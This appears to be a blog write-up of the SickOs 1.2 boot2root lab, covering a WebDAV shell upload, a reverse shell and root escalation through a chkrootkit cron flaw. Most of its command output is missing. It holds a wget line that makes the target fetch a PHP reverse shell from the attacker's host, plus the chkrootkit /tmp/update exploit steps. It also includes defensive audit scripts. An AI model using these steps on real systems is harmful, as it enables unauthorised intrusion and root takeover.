Fully Sick(Os) 1.2 mate

It’s been a while since I have looked at any boot2root challenges, so let’s have a crack at SickOs: 1.2 by @D4rk36

“This is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.”

Bit of a side note before we start. The description mentions “Need to use VMware. You may have issue with VirtualBox.” If you wish to use VirtualBox, as I did, all you need to do is edit the .ovf file, replace all instances of “ElementName” with “Caption”, and replace “vmware.sata.ahci” with “AHCI”. Then delete the .mf file (it is the manifest holding checksums of the .ovf, which no longer match after the edit) and import the .ovf into VirtualBox as you would normally.
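The two substitutions and the manifest removal, scripted. This is an added example, not part of the original post; it assumes GNU sed and the usual layout where the .mf manifest sits beside the .ovf with the same base name. The function writes a .bak copy first so the VMware-compatible original is kept.

```shell
# Added example (not from the original post): convert a VMware-exported OVF so
# VirtualBox accepts it, following the substitutions described above.
# Assumes GNU sed and a .mf manifest with the same base name as the .ovf.
convert_ovf_for_vbox() {
  ovf="$1"
  [ -f "$ovf" ] || { echo "no such file: $ovf" >&2; return 1; }
  # Keep the untouched original around in case the VMware import is needed later.
  cp "$ovf" "$ovf.bak"
  sed -i 's/ElementName/Caption/g; s/vmware\.sata\.ahci/AHCI/g' "$ovf"
  # The .mf manifest carries SHA checksums of the .ovf and disk images. After
  # editing the .ovf those checksums no longer match and the import is rejected,
  # so the manifest is removed to skip the integrity check.
  mf="${ovf%.ovf}.mf"
  [ -f "$mf" ] && rm -f "$mf"
  return 0
}

# Count VMware-specific markers still present; 0 means the file is ready to import.
vmware_markers_left() {
  grep -c -E 'ElementName|vmware\.sata\.ahci' "$1" || true
}

# Usage: convert_ovf_for_vbox SickOs1.2.ovf && vmware_markers_left SickOs1.2.ovf
```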

OK, enough chatter, let’s get started! First up, what IP are we attacking:

Let’s find our starting point…

Let’s take a look at the web server in our browser.

Now let’s take a look with curl.

As the comment says, there’s nothing there, so we’ll fuzz for directories.

Taking a look at /test/ reveals that directory listing is enabled for this server.

What options are available to us?

Nothing exciting on the root directory, but /test looks a little more promising: its OPTIONS response shows DAV enabled and allows methods that let a client write files. Let’s try to upload a simple shell to test connectivity.

Success. I tried running netcat and a bash reverse shell from this simple cmd shell, but I wasn’t having any luck getting a connection.

Time to upload a bigger PHP shell. At first it failed with port 80, so I set the listening port to 443.

Success.

http://192.168.77.50/test/phpsimpleshell.php?cmd=wget%20192.168.77.43:443/phprevshell.php

Now it is just a simple case of setting up a listener and kicking off our shell.

Enter, stage left: laziness. I check for any low-hanging fruit with Security Sift’s linuxprivchecker script.

Unfortunately linuxprivchecker didn’t lead me to any vulnerabilities or exploits, so I started the manual enumeration of the system. Time passed, more time passed, and a little more time passed. Nothing, nada, nichts.

I take another look at the linuxprivchecker output, and focus in on root’s cronjobs.

All of the services/binaries look fine to me, apart from chkrootkit.

Bingo! This version of chkrootkit has a local root vulnerability which can be found here.

As per the author’s findings, the steps to reproduce are:

"- Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in cron.daily) and has write access to /tmp (not mounted noexec), he may easily take advantage of this."
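From the defender’s side, the three conditions in that advisory (chkrootkit run from cron as root, a non-root ‘update’ file in /tmp, and /tmp not mounted noexec) are all checkable. Below is an added audit script, not part of the original post or of chkrootkit itself; every path is a parameter so it can be run against fixtures or a mounted image as well as a live host, and it assumes a Linux /proc/mounts layout and GNU coreutils stat.

```shell
# Added example (not from the original post): audit a host for the chkrootkit
# cron exposure described in the advisory above. All paths are parameters.
# Assumes Linux /proc/mounts format and GNU stat (-c %U).

# Return 0 if the given mount point carries the noexec flag in a mounts file
# (pass /proc/mounts on a live system).
mount_is_noexec() {
  mounts="$1"; mp="$2"
  awk -v mp="$mp" '$2 == mp { print $4 }' "$mounts" | tr ',' '\n' | grep -qx noexec
}

# Print the cron files under a cron directory (e.g. /etc/cron.daily) that
# invoke chkrootkit. Empty output means it is not scheduled from there.
chkrootkit_cron_entries() {
  grep -l 'chkrootkit' "$1"/* 2>/dev/null || true
}

# Report on an 'update' file in a temp directory. Returns 1 only in the
# dangerous case: the file exists and is not owned by root.
audit_update_file() {
  f="$1/update"
  if [ ! -e "$f" ]; then
    echo "OK: no $f"
    return 0
  fi
  owner=$(stat -c %U "$f")
  if [ "$owner" != "root" ]; then
    echo "WARN: $f is owned by $owner and would be executed as root by the chkrootkit cron job"
    return 1
  fi
  echo "INFO: $f exists but is owned by root"
  return 0
}

# Combine the checks. Returns 0 (exposed) only when chkrootkit runs from cron,
# a non-root 'update' sits in the temp dir, and that dir is not mounted noexec.
chkrootkit_exposed() {
  crondir="$1"; tmpdir="$2"; mounts="$3"; mp="$4"
  [ -n "$(chkrootkit_cron_entries "$crondir")" ] || return 1
  audit_update_file "$tmpdir" >/dev/null && return 1
  mount_is_noexec "$mounts" "$mp" && return 1
  return 0
}

# Usage on a live host:
#   chkrootkit_exposed /etc/cron.daily /tmp /proc/mounts /tmp && echo "EXPOSED"
```

Any one of the three conditions being false closes the window: mounting /tmp noexec or not running chkrootkit from cron as root both work, and so does upgrading to a chkrootkit release that no longer executes /tmp/update. Alerting on the appearance of a non-root /tmp/update is a cheap detection while that is arranged.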

Too easy. I’ll use my faithful suid binary for this one.

All we need to do is compile it in /tmp, set up an 'update' script to chmod/chown the suid binary, and voila… we should have root.

Now… we sit patiently and wait for the chkrootkit crontab to execute. After a little time, we have our suid binary ready to rock and roll.

Let’s get root!

And let’s grab the flag!

THE END

Thanks for the SickOS 1.2 boot2root challenge @D4rk36.

Thank you like always @Vulnhub and @g0tmi1k for hosting such awesome challenges.

Until next time, tight lines and happy hacking.